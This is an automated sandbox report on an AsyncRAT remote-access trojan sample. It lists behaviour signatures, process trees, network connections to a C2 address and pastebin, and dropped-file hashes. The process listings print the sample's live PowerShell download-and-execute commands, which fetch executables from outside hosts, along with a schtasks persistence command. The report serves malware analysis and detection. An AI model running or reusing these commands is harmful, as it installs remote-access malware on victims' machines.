Malware Analysis Report

2025-01-02 12:11

Sample ID 240417-nqk9dadd93
Target a7d63348cfe9b0dc9d3aaec28c76c8f0.exe
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
Tags
rat default asyncrat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

Threat Level: Known bad

The file a7d63348cfe9b0dc9d3aaec28c76c8f0.exe was found to be: Known bad.

Malicious Activity Summary

rat default asyncrat

AsyncRat

Asyncrat family

Async RAT payload

Async RAT payload

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-17 11:36

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-17 11:36

Reported

2024-04-17 11:38

Platform

win7-20240221-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 2184 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 2184 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 2588 wrote to memory of 2932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2932 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2184 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 2184 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 2184 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\System32\cmd.exe
PID 2184 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\system32\cmd.exe
PID 2184 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\system32\cmd.exe
PID 2184 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe C:\Windows\system32\cmd.exe
PID 2624 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2624 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2624 wrote to memory of 2436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2816 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2816 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2816 wrote to memory of 2552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2588 wrote to memory of 2456 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2456 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2456 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2816 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 2816 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\system.exe
PID 1908 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 1908 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 1908 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Roaming\system.exe C:\Windows\System32\cmd.exe
PID 1216 wrote to memory of 2656 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 2656 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 2656 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 1892 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 1892 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 1892 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 2352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 2352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 2352 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 2896 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 2896 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 2896 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1216 wrote to memory of 3032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe

"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8D80.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp

Files

memory/2184-0-0x0000000001030000-0x0000000001048000-memory.dmp

memory/2184-1-0x000007FEF5720000-0x000007FEF610C000-memory.dmp

memory/2184-7-0x0000000000CA0000-0x0000000000D20000-memory.dmp

memory/2932-8-0x00000000029F0000-0x0000000002A70000-memory.dmp

memory/2932-9-0x000000001B140000-0x000000001B422000-memory.dmp

memory/2932-10-0x0000000002700000-0x0000000002708000-memory.dmp

memory/2932-11-0x000007FEED770000-0x000007FEEE10D000-memory.dmp

memory/2932-12-0x00000000029F0000-0x0000000002A70000-memory.dmp

memory/2932-13-0x000007FEED770000-0x000007FEEE10D000-memory.dmp

memory/2932-14-0x00000000029F0000-0x0000000002A70000-memory.dmp

memory/2932-15-0x00000000029F0000-0x0000000002A70000-memory.dmp

memory/2184-16-0x0000000077200000-0x00000000773A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp8D80.tmp.bat

MD5 260f80c17b07c7f932ab0fb8b35fef12
SHA1 8edad7745030341383628525fe93a0db2bcafb3e
SHA256 76b926550be74146c6ea147230c3537f110350b5bfa97c44967a62e663c030cf
SHA512 8ee8c14e807f54e4abf3daf1ff6d5d47cbbc6c325195630d48690d87f555821b248464ae7494075762302b73137bcab4fb3ec15f2f6967ccd6a11988198cb212

memory/2184-26-0x000007FEF5720000-0x000007FEF610C000-memory.dmp

memory/2184-27-0x0000000077200000-0x00000000773A9000-memory.dmp

memory/2932-28-0x000007FEED770000-0x000007FEEE10D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 dd359118062db8379da3d8bd9118b9de
SHA1 149fd1ee58fca63c4d6a0ae0922c0aecb3d42a91
SHA256 4a4bbf16c5e38efe52ba8c0ae14121edf43635850f52a96460d392a3b12e2507
SHA512 0afc7f24ce18b1501ef548c5e61edae81c0b09718c78da439f7ba9b57f64131a7152b3be4dfc1ba1c10bf6f49b0978bab9f0c1f7351a911ea5e19db76926f58e

memory/2456-35-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2456-34-0x000000001B200000-0x000000001B4E2000-memory.dmp

memory/2456-36-0x0000000002320000-0x0000000002328000-memory.dmp

memory/2456-37-0x0000000002620000-0x00000000026A0000-memory.dmp

memory/2456-39-0x0000000002620000-0x00000000026A0000-memory.dmp

memory/2456-38-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2456-40-0x0000000002620000-0x00000000026A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

memory/1908-44-0x0000000000320000-0x0000000000338000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/1908-46-0x000007FEEE1B0000-0x000007FEEEB9C000-memory.dmp

memory/1908-47-0x000000001ADB0000-0x000000001AE30000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2656-55-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2656-54-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2656-56-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2656-58-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2656-59-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2656-57-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2456-60-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/1908-61-0x0000000077200000-0x00000000773A9000-memory.dmp

memory/1892-67-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/1892-68-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1892-69-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/1892-71-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1892-72-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1892-70-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1892-73-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2656-74-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2352-86-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/2352-88-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/2352-89-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2352-87-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1628-91-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/1628-93-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/2352-95-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1628-94-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/1908-96-0x000007FEEE1B0000-0x000007FEEEB9C000-memory.dmp

memory/1628-92-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/1628-90-0x000000000265B000-0x00000000026C2000-memory.dmp

memory/2352-97-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/2896-104-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2896-103-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2896-105-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/1908-107-0x000000001ADB0000-0x000000001AE30000-memory.dmp

memory/2896-109-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2896-108-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2896-106-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2896-110-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/3032-116-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/3032-117-0x0000000002420000-0x00000000024A0000-memory.dmp

memory/3032-118-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-17 11:36

Reported

2024-04-17 11:38

Platform

win10v2004-20240226-en

Max time kernel

151s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\system.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\system.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe N/A
